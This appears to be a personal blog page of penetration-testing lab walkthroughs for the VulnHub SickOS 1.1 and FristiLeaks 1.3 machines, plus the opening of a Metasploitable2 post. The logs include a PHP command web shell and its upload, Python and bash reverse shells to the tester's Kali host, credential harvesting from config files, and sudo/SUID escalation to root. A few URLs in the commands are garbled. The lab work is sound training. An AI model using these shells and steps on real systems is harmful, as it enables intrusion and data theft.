Pen Test Assessment

Penetration Test Assessment

A penetration test assessment was a requirement of a short cource on Penetration Testing from the Charles Sturt University. As part of the assessment, students were provided an ova image of a virtual machine. The virtual machine was to be the target of a penetration test, and students were expected to obtain flags for submission. A walkthrough of the assessment is presented here.

For the benefit of other students, the names and values of the flags have been redacted, and replaced with the string REDACTED

[Read More]

vulnhub.com sickos1.1

host: 192.168.56.1 dhcp-server: 192.168.56.100 kali: 192.168.56.101

* log

  # 2015/12/26 19:00 -> 19:40 (40min)

  # 2015/12/26 22:10 -> 23:50 (1hr 40min)

  # 2015/12/27 18:20 -> 18:40 (20min)

  # total time = 2hr 40min)



* discovery - target

  * nmap --min-parallelism=100 -sP -T5 192.168.56.0/24

  * found: 192.168.56.102



* discovery - services

  * nmap --min-parallelism=100 -A -T5 -p1-65535 192.168.56.102

  * found: port 22/tcp ssh, 3128/tcp squid, 8080/tcp ??

  * !!exploit-db did not reveal much

  * tried: nc -n -v 192.168.56.102 3128

  * with GET /

    * found: invalid URL error

  * with GET http://127.0.0.1/

    * found: landing page with BLEHHH!!! and PHP/5.3.10-1ubuntu3.21

  * using proxy: export http_proxy="http://192.168.56.102:3128"

  * wget http://192.168.56.102/robots.txt

  * found http://192.168.56.102/wolfcms

  * !!decided to use iceweasel with proxy instead of command line

    * did not find generator metatag

    * downloaded wolfcms

      * found: README.md, requested http://192.168.56.102/wolfcms/README.md

      * found: version = 0.8.2

      * found: , requested http://192.168.56.102/wolfcms/wolf/plugins/file_manager/file_manager.css

      * found: http://192.168.56.102/wolfcms/wolf/plugins/ is also browseable

      * found: that file_manager plugin is installed

    * read 

      - https://www.wolfcms.org/download/security-patches.html

      - http://www.securityfocus.com/archive/1/521797

      - https://www.exploit-db.com/exploits/36818/

      - https://packetstormsecurity.com/files/133011/Wolf-CMS-0.8.2-Open-Redirect.html 

      - https://github.com/wolfcms/wolfcms/issues/619

    * vulnerabilities

      * file upload

      * open redirect

    * stupidly tried admin/admin

    * uploaded shell.php using file uploaded

    * http://192.168.56.102/wolfcms/public/shell.php?cmd=id

    * used shell.php 

      * found: config.php using curl http://192.168.56.ll.php -d cmd="cat ../config.php"

      * found: mysql db=wolf, username=root, password=john@123

    * used curl http://192.168.56.102/wolfcms/public/shell.php --data-urlencode "cmd=mysqldump -u root -pjohn@123 mysql"

      * found:

    * used shell.php to list directories

      * found: /var/www/connect.py

    * attempted python reverse shell

      * kali - nc -vvv -l -p 1234

      * sickos - curl http://192.168.56.102/wolfcms/public/shell.php --data-urlencode "cmd=/usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.56.101\",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/bash\",\"-i\"]);'"

    * attempted to get tty, inside reverse shell

      * /usr/bin/python -c 'import pty; pty.spawn("/bin/sh")'

    * tried to use su - sickos, using the mysql password john@123, worked!!

    * sudo bash

    * ls -l /root

    * cat a0216ea4d51874464078c618298b1367.txt

    





* appendix



// shell.php

-- start of shell.php --

<?php

if(isset($_REQUEST['cmd']))

{

  $cmd = $_REQUEST['cmd'];

  system($cmd);

  echo "<pre>$cmd</pre>";

}

else

{

  echo "<pre>usage: ?cmd=</pre>";

}

?>

-- end of shell.php --

vulnhub.com fristileaks1.3

host: 192.168.56.1 dhcp-server: 192.168.56.100 kali: 192.168.56.101

* log

  # 2015/12/24 14:45 -> 16:30 (1hr 45min)

  # 2015/12/25 15:00 -> 17:45 (2hr 45min)

  # total time = 4hrs 30min



* discovery - target

  * nmap --min-parallelism=100 -sP -T5 192.168.56.0/24

  * found target: 192.168.56.102

  

* discovery - services

  * nmap --min-parallelism=100 -A -T5 -p1-65535 192.168.56.102

  * found ports: 80



* enumerate port 80

  * wget http://192.168.56.102

  * cat index.html

  * wget http://192.168.56.102/images/keep-calm.png

  * wget http://192.168.56.102/robots.txt

    * robots.txt: disallow /cola /sisi /beer

  * wget http://192.168.56.102/cola/

    * since its not the URL, and we should drink fristi

  * wget http://192.168.56.102/fristi/

    * cat index.html

      * read description meta tag reg comment about base64

      * noticed second commented out base64

      * suspect username: eezeepz

    * extracted commented out line using vi

      * deleted other lines

      * joined all lines (:%j)

      * removed spaces (:%s/\ //g)

      * saved into fristi_img2.txt

  * base64 -d fristi_img2.txt > img2

  * file img2

  * mv img2 img2.png

  * suspect password: keKkeKKeKKeKkEkkEk



* access

  * http://192.168.56.102/fristi/

  * myusername: eezeepz, mypassword: keKkeKKeKKeKkEkkEk

  * logged into http://192.168.56.102/fristi/login_success.php

  * clicked upload file link to http://192.168.56.102/fristi/upload.php

  * uploaded img2.png and got message regarding /uploads

  * verified upload location http://192.168.56.102/fristi/uploads/img2.png



* attempted shell access using weevely (failed)

  * generated weevely shell: weevely generate password shell.php

  * cp /usr/share/weevely/shell.php .

  * attempted upload: only allowed png,jpg,gif

  * mv shell.php shell.gif

  * uploaded and connected

  * weevely http://192.168.56.102/fristi/uploads/shell.gif password

  * fixed pythong issues

    * tar zxvf PySocks-1.5.6.tar.gz

    * cd PySocks-1.5.6/

    * ./setup.py build

    * ./setup.py install

  * weevely http://192.168.56.102/fristi/uploads/shell.gif password

  * unable to connect



* used old script to execute commands

  * renamed to shell.php.jpg

  * uploaded file

  * curl http://192.168.56.102/fristi/uploads/shell.php.jpg?cmd=id

  * uid=48(apache) gid=48(apache) groups=48(apache)

  * curl http://192.168.56.102/fristi/uploads/shell.php.jpg -d cmd="cat /etc/passwd"

  * found: eezeepz, admin, fristigod, fristi

  * ls -l /home/

  * found: drwx---r-x. on eezeepz

  * ls -l /home/eezeepz

  * found: 

    * notes.txt

    * commands (various)

  * cat /home/eezeepz/notes.txt

  * found: 

    * cron runs /tmp/runthis with admin privileges every minute

    * commands chmod, df, cat, echo, ps, grep, egrep in /home/admin

    * access to /usr/bin/*

  * changed access to /home/admin

    * curl http://192s/shell.php.jpg -d cmd="echo '/home/admin/chmod 755 /home/admin/' > /tmp/runthis"

  * ls -las /home/admin/

  * found: cryptedpass.txt, cryptpass.py, and whoisyourgodnow.txt (owner by fristigod)

  * cat /home/admin/whoisyourgodnow.txt

  * found: =RFn0AKnlMHMPIzpyuTI0ITG

  * cat /home/admin/cryptedpass.txt

  * found: mVGZ3O3omkJLmy2pcuTq

  * cat /home/admin/cryptpass.py

  * found:

    * function does base64 then rot13

  * created own script to decrypt password

  * python ./decryptpass.py mVGZ3O3omkJLmy2pcuTq

  * found: thisisalsopw123

  * python ./decryptpass.py =RFn0AKnlMHMPIzpyuTI0ITG

  * found: LetThereBeFristi!

 

* interactive shell

  * got tired of using the php script and decided to get interactive shell

  * on kali: nc -n -vvv -l -p 80

  * ran via php: /bin/bash -i > /dev/tcp/192.168.56.101/80 0<&1 2>&1, but encoded for url as %2Fbin%2Fbash%20-i%20%3E%20%2Fdev%2Ftcp%2F192.168.56.101%2F80%200%3C%261%202%3E%261

  * now have shell (without TTY, so cannot use su yet)

  * find files owned by users

    * find / -user eezeepz 2>&1 | grep -v "Permission denied"

    * find / -user admin 2>&1 | grep -v "Permission denied"

    * find / -user fristi 2>&1 | grep -v "Permission denied"

    * find / -user fristigod 2>&1 | grep -v "Permission denied"

      * found: /var/fristigod

    * found: empty mailboxes

    * found: /var/www/notes.txt 

      * not very useful since we already figured this out

  * tried to get tty shell 

    // https://pen-testing.sans.org/blog/2014/07/08/sneaky-stealthy-su-in-web-shells

    // http://netsec.ws/?p=337

  * /usr/bin/python -c 'import pty; pty.spawn("/bin/sh")'

  * used: su fristigod and password: LetThereBeFristi!

  * cd /var/fristigod

  * ls -las 

  * found: .bash_history and .secret_admin_stuff

  * cat .bash_history

  * found: sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom

  * ls -las /var/fristigod/.secret_admin_stuff/

  * found: suid/guid set on doCom file and owned by root:root

  * file /var/fristigod/.secret_admin_stuff/doCom

  * strings /var/fristigod/.secret_admin_stuff/doCom

  * sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom

  * found: Usage: ./program_name terminal_command ...

  * sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom id

  * found: uid=0(root) gid=100(users) groups=100(users),502(fristigod)

  * sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom bash

  !! got root !!

  * found: cat /root/fristileaks_secrets.txt

  * cat /root/fristileaks_secrets.txt

  * found: Flag: Y0u_kn0w_y0u_l0ve_fr1st1



# Other

* /root/.c has source for doCom

* cat /root/.mysql_history

  



* appendix

// http://snipplr.com/view/72936/simple-php-backdoor-shell/

-- start of old script -- 

<?php

if(isset($_REQUEST['cmd']))

{

  $cmd = $_REQUEST['cmd'];

  system($cmd);

  echo "<pre>$cmd</pre>";

}

else

{

  echo "<pre>usage: ?cmd=</pre>";

}

?>



-- end of old script





// modified cryptpass.py script

-- start of decryptpass.py script --

import base64,codecs,sys



#def encodeString(str):

#    base64string= base64.b64encode(str)

#    return codecs.encode(base64string[::-1], 'rot13')



def decodeString(str):

    rottedString= codecs.encode(str[::-1], 'rot13')

    return base64.b64decode(rottedString)



#cryptoResult=encodeString(sys.argv[1])

#print cryptoResult



#decryptedResult=decodeString(cryptoResult)

#print decryptedResult



decryptedResult=decodeString(sys.argv[1])

print decryptedResult

-- end of decryptpass.py script --

Metasploitable2 Walk-through

(This is an interim post and will be updated progressively. This note will be removed once done.)

This post extends the walk-though on the initial version of Metasploitable at http://nkush.blogspot.com.au/2011/09/metasploitable-walkthrough.html. It should be noted that some commands and output may have been truncated for the purposes of brevity.

Set-up The set-up included two machines in a virtual test environment using VirtualBox. The first was a Metasploitable virtual machine (VM) and the second a Kali 1.0 VM. The two hosts were configured to have a host-only network connection. The test environment was isolated to the 192.168.32.0/24 network. All commands were execute on the Kali VM.

[Read More]